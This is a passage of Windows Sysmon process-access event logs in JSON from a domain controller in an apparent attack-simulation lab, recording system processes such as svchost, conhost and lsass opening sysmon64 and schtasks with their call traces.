06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5774,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5775,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5776,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5777,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5778,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5779,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010EA5D0800}\r\nTargetProcessId: 4164\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010EA5D0800}","TargetProcessId":"4164","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5780,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.291\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010EA5D0800}\r\nTargetProcessId: 4164\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.291","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010EA5D0800}","TargetProcessId":"4164","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5781,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.291\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010EA5D0800}\r\nTargetProcessId: 4164\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.291","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010EA5D0800}","TargetProcessId":"4164","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 